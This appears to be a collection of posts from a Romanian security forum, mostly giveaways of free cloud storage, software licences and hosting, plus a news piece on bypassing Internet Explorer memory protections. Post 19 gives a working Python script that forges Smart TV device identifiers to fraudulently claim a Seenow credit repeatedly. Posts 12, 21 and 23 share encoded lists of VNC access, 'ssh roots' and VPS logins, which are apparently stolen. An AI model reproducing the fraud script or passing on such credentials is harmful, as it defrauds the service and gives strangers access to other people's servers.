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  1. OneDrive — formerly known as SkyDrive — is cross-platform cloud storage offered by a well-known tech giant, Microsoft. Aside from regular features of allowing you to store and share any file type with it, OneDrive comes with additional features like built-in Office Online (which allows you to create or edit Office documents) and syncing of files stored in OneDrive across all your computers, smartphones, and tablets. OneDrive normally offers 15 GB free cloud storage to everyone. For a limited time, you can get an additional 100 GB for a total of 115 GB free cloud storage! This offer is available to US residents only. Sorry everyone else — this is Microsoft’s restriction, not ours! Sale ends in 13 days 18 hrs 36 mins Link: Free 115 GB OneDrive cloud storage by Microsoft (100% discount)
  2. We all know about Google Drive, the cloud storage and file backup service offered by Google. Everyone can get free 15 GB cloud storage on Google Drive at any time: just signup for a Google account (or login to your existing Google account), head over to the Google Drive page, and boom — you have your free 15 GB that never expires. For a limited time, however, you can get an additional (extra) 2 GB for your Google Drive account for life. Yes, that means you will have 17 GB on Google Drive that won’t ever expire. Get it now. Sale ends in 2 days 18 hrs 36 mins Link: Free lifetime 17 GB Google Drive cloud storage (100% discount)
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  5. For a long time, Microsoft’s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks. Microsoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users. Most recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code. Researchers have had a growing interest in bypassing EMET and memory protections for some time, with some successful bypasses disclosed and ultimately addressed by Microsoft. And until the Operation Snowman attacks, they were exclusively the realm of white hats—as far as we know publicly. As with the EMET protections, Heap Isolation and Delay Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both. DeMott’s bypass relies on what he termed a weakness in Microsoft’s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said. “Thus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,” he wrote in a report published this week. This separation of good and bad data, however, isn’t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said. Taking advantage of these conditions, DeMott’s bypass works through the use of what he calls a “long-lived dangling pointer.” “If an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),” DeMott said. “And finding useful objects in either playground to replace the original turns out not to be that difficult either.” DeMott’s bypass is a Python script which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap. “This information can be used to help locate useful objects to attack either heap,” he wrote. “And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.” DeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit. “If you have a working UaF bug, you have to make sure it’s of this long-live type and can basically upgrade it to an existing attack to bypasses these mitigations,” DeMott told Threatpost. “There’s no secret sauce, like every attack, it just depends on a good bug.” DeMott said he expects use-after-free to be the next iteration of memory corruption attacks. “There’s always a need [for attackers] to innovate,” DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. “It’s starting to happen, it’s coming if it’s not already here.” Source
  6. Bafta! http://www.bitdefender.com/media/html/spread/download-bms/
  7. Scuze de reclama dar, omul acesta face bani cu lucrurile gratuite de pe aici.Are userul k0k0.(ban xD) eXtreamCS.com - Vand CPanels de la 3e : Anunturi
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  9. Toate lumea isi doreste o promotie cu licenta gratuita pentru produsul de securitate utilizat. Atunci cand o gasesti esti in culmea fericirii, iar daca o primesti prin email, fara chiar a o solicita esti in extaz. Sau nu ar trebui sa fii ? Ei bine, atunci cand primesti oferte nesolicitate, trebuie sa fii circumspect si sa nu deschizi niciodata atasamente suspecte, mai ales cand contin fisiere executabile si denumirea lor nu are nicio legatura cu mesajul primit. Se raspandeste astfel un email cu subiectul “Norton Antivirus Free 1 Year Trial!” si contine atasat fisierul office.zip, ce include executabilul office.exe. Fisierul este infectat cu un malware de tip troian, a carui detectie este una buna: 22 din 56 de scannere antivirus, conform VirusTotal.com. Continutul email-ului este tentant si suna astel: Odata rulat, acesta va porni automat cu Windows-ul, va trimite date personale din PC-ul tau catre un server la distanta si va descarca alti virusi in calculatorul tau. Pentru DEVIRUSARE descarcati si scanati PC-ul cu Malwarebytes Anti-Malware. -> Sursa: Norton Antivirus Free 1 Year Trial! – email cu atasament virusat
  10. Licenta valabila pentru un calculator timp de un an de zile. Sale ends in 19 hrs 10 mins Free Ashampoo WinOptimizer 2015
  11. Pentru cei care lucreaza in domeniul graficii ( 3D modelling, animare , etc) cei de la blackmagic s-au gandit sa puna la dispozitie oricui sa descarce (versiunea free) Fusion. Exista versiunea Studio (999$) pe care au imbunatatit-o cu urmatoarele caracteristici: Advanced optical flow image analysis tools for stereoscopic 3D work, retiming and stabilization. Fusion Studio also includes support for third-party OpenFX plugins, unlimited distributed network rendering, and Generation for studio wide multi user collaboration to track, manage, review and approve shots when working with large creative teams on complex projects. Ce pot sa zic , entuziastii care lucreaza in AE ar putea sa-l incerce ; Have fun PS: Din cate stiu ( nu m-am interesat) exista o licenta de "tip unity"(Nu stiu exact denumirea) care pune o limita profitului realizat prin vanzarea produsului facut cu acest program. LINK
  12. Download Pass: kM=umMR1RuJaQxOtnLjam+f9mszZlwua Hint: mi-am luat megan :"> Am gasit o lista mai veche si le-am verificat, poate aveti nevoie de cateva (nu prea sunt sortate sper sa va mearga cateva). Pentru cei ce sunt interesati de screenshoturi pentru liste de VNC-uri, check this topic: https://rstforums.com/forum/83678-screenshot-uri-pentru-liste-vnc-uri.rst , thanks.
  13. Hello, De curand mi-am luat niste hosting si e destul de mult pentru necesitatile mele ( cred ca folosesc 100 kb din el ). Am posibilitatea sa ofer cate 500 mb - 1 GB de hosting cuiva care are domeniu dar nu are hosting ( dau maxim 5 GB din el adica maxim 10 persoane a cate 500 mb sau 5 persoane a cate 1 GB ... bla bla faceti si voi niste calcule ). Problema se pune in felul urmator : nu vreau m?g?rii pe server sau alte tampenii si nici copii care vor sa faca magarii. Deci cei care vor, posteaza un reply dar totusi as vrea ca un admin sa mi-l "recomande" ca e de incredere. P.s. : Daca conteaza cumva, e si SSD cu trafic nelimitat.
  14. hello HideMyAss Premium Proxies 11/11/2013 Full List==> HideMyAss Premium Proxies 11 Nov 2013ProxyGratuit-Proxy Server/free proxy sites/Online Proxy/Proxy Website Enjoy
  15. Features Search thousands of assets, including popular icon packs, without leaving Photoshop. Drag assets into your current composition and use them in the original format (layers, vector objects, adjustment layers and so on) It's FREE. All the assets are provided under a Creative Commons Attribution 3.0 Unported License * not yet, but we're ambitious How to install Close Photoshop before installing the extension. If you don't have it, download and install Adobe Extension Manager Double click the .zxp file from your computer. It will launch Adobe Extension Manager. Open Photoshop and choose Window - Extensions - Blendmein. Enjoy! Download CS6 Extension | Download CC Extenstion BlendMe.in Photoshop Extension - Browse thousands of Icons, Vectors and other assets directly from Photoshop
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  18. http://www.youtube.com/watch?v=zccI-O3dm38
  19. Seenow has a promotion: they give you 10 EUR for free if you connect with your account on a Smart TV which has been purchased recently. This promotion is only for one TV you have. So, there must be something TV sends in order to identify itself, something unique... To keep the long story short, here is the POC in Python v 3.3: #usage: scriptname.py email@email.com password #email is the one associated with SeeNow account #password is your SeeNow password import urllib.request, urllib.parse, urllib.error import urllib.request, urllib.error, urllib.parse import json import random import string import sys def random_char(y): return ''.join(random.choice(string.ascii_letters) for x in range(y)) def randomMAC(): mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ''.join(map(lambda x: "%02x" % x, mac)) url = 'http://www.seenow.ro/smarttv/user/login/sessionid/f' + str(random.randint(0,9)) + str(random_char(22)) + str(random.randint(0,9)) + str(random.randint(0,9)) + str(random.randint(0,9)) url = url + '?firmware=T-INFOLINK2012-0' + str(random.randint(0,9)) + str(random.randint(10,28)) url = url + '&modelCode=12_X' + str(random.randint(10,20)) + 'PLUS' url = url + '&macAddress=' + str(randomMAC()) url = url + '&deviceUniqueId=' + random.choice(string.ascii_uppercase) + str(random.randint(0,9)) + str(random_char(6)) + str(random.randint(0,9)) + str(random_char(6)) url = url + '&deviceType=0&appId=111299000393&appVersion=2.05&language=RO&language_id=1' user_agent = 'Mozilla/5.0 (SmartHub; SMART-TV; U; Linux/SmartTV; Maple2012) AppleWebKit/534.7 (KHTML, like Gecko) SmartTV Safari/534.7' values = {'email' : sys.argv[1], 'password' : sys.argv[2], 'remember' : 'false' } headers = { 'User-Agent' : user_agent, 'Content-Type' : 'application/x-www-form-urlencoded' } data = urllib.parse.urlencode(values) binary_data = data.encode('ASCII') req = urllib.request.Request(url, binary_data, headers) response = urllib.request.urlopen(req) resp = str(response.read()) tosearch = 'success' if resp.find(tosearch) > 0: print (" [X] YOU ARE LOGGED IN! Check if you have the 10 EUR into your account") print(" [+] Response: \n" + resp) Hope you'll enjoy it. Keep it safe! Do not abuse!
  20. Foursquare users are a helpful lot, especially when it comes to travel. If you find yourself in the unfortunate situation of being stuck at an airport without free Wi-Fi, just ask Foursquare for the insider access. The travel blog foXnoMad points out you can track down a wireless password for an airport just by Googling something like "foursquare Ataturk Airport." Search for the words "wifi" or "wireless" and you should find tips on either where you can grab free Wi-Fi (e.g., inside some airport bar) or the wireless password. The article also points out two free apps specifically for filtering Foursquare Wi-Fi tips: 4sqwifi (iOS) and Venue Spot (Android). It's a good trick to know if that URL hack or just asking for free Wi-Fi don't work. Foursquare also comes in handy for finding free Wi-Fi passwords anywhere else. Source: Get Free Airport Wi-Fi with Foursquare
  21. aHR0cDovL3Bhc3RlYmluLmNvbS96M2hxdU5jag== hint:b64 enjoy ssh roots hehe US, all us want a bin of this bot created for you? contact me in the email
  22. (Scuzati categoria daca am gresit, chiar nu stiam unde sa postez, din moment ce nu vand acest serviciu or w/e.) Am primit un e-mail asta-seara: "Hello, San Francisco! Great news! DigitalOcean has opened a new datacenter location in San Francisco, CA! In addition to serving the west coast, the datacenter is located next to the trans-pacific cables, providing a fast connection to Asia. Register with a credit card and enter 'HELLOSF' in the promo code field to receive a free $5 credit (one month free for a 512MB RAM, 20GB SSD Disk, 1TB Transfer droplet)." Vroiam doar sa "impart vestea" pentru cei care nu stiau si cauta de asemenea un serviciu de genu "moca" si rapid. Stiu ca specs nu sunt grozave dar ... mai bine decat nimic . Have fun LINK
  23. Din cand in cand mai aduc cateva vps-uri. Sunt invitati si ceilalti dornici sa contribuie acestui thread. Pana una alta: Part 1: A8LxpohUpxAuSo1Dnik3L8T9bHBGeG6T0xcbOluN+oHup8Sunibte/CC Part 2: 5o7KIrle5og41ONfYoRyd=kNXrYi1F0AUnPMB4+fPcPzDrldL4Nndzl8DrLs5=lhxSv6Lxn7PNnW1522 Part3: 5o7KIrle5og41ONfYoRyd=kNXrYi1F0AUnPMB4+fPcPzDrldLO+zo4l8DcSO1yPeLOnQUWNLPNnW1522 Parola e undeva in thread-ul asta
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